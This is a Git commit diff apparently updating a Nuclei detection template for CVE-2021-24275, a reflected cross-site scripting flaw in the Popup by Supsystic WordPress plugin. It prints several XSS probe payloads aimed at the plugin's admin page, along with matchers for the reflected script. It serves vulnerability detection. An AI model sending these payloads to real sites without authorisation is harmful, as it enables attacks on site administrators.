Update CVE-2021-24275.yaml

patch-1
Prince Chaddha 2021-09-29 00:22:52 +05:30 committed by GitHub
parent c0912f3a08
commit 58e6ee07a9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 5 deletions

View File

@ -4,27 +4,27 @@ info:
name: Popup by Supsystic < 1.10.5 - Reflected Cross-Site scripting (XSS) name: Popup by Supsystic < 1.10.5 - Reflected Cross-Site scripting (XSS)
author: dhiyaneshDK author: dhiyaneshDK
severity: medium severity: medium
description: The Popup by Supsystic WordPress plugin before 1.10.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue.
reference: reference:
- https://wpscan.com/vulnerability/efdc76e0-c14a-4baf-af70-9d381107308f - https://wpscan.com/vulnerability/efdc76e0-c14a-4baf-af70-9d381107308f
tags: wordpress,cves,cve2021 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24275
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10 cvss-score: 6.10
cve-id: CVE-2021-24275 cve-id: CVE-2021-24275
cwe-id: CWE-79 cwe-id: CWE-79
description: "The Popup by Supsystic WordPress plugin before 1.10.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue" tags: wordpress,cve,cve2021,wp-plugin
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab="onmouseover=alert(/XSS/)//' - '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//'
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- 'alert(/XSS/)/' - '</script><script>alert(document.domain)</script>'
condition: and condition: and
- type: status - type: status